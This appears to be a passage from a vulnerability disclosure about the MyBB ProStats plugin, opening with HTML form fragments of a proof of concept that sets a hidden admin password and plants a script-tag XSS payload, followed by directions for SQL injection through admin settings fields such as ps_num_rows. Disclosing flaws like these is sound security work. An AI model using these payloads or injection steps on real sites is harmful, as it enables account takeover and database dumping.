<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<td class="left"><label for="gallery_url"></label></td>
<td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>
--------------------------------------------------------
# Email - saadi_linux@rocketmail.com
# GreeTz 2 All Pakistani Security Researchers
# Home - http://security-geeks.blogspot.com
---------------------------------------------------------
I was working on some MyBB plugins and found some vulns in them..
So for now, ProStats.
Vendors: http://prostats.wordpress.com
ProStats is a well-known MyBB plugin and is vulnerable to SQL injection inside the admin panel and change viewer.
It's not much exploitable because you need admin logins, but it can be handy for dumping the DB if you failed to shell it ;)
OK, here:
Go to Plugins and just inject the num rows settings..
It's vulnerable in most of the parameters inside settings.
Like the POST field ps_num_rows etc.
Screen Shot
Salam,
I was thinking of making a blog for my security findings and updates, so
all my security updates are going to come here..
Cheers
Saadi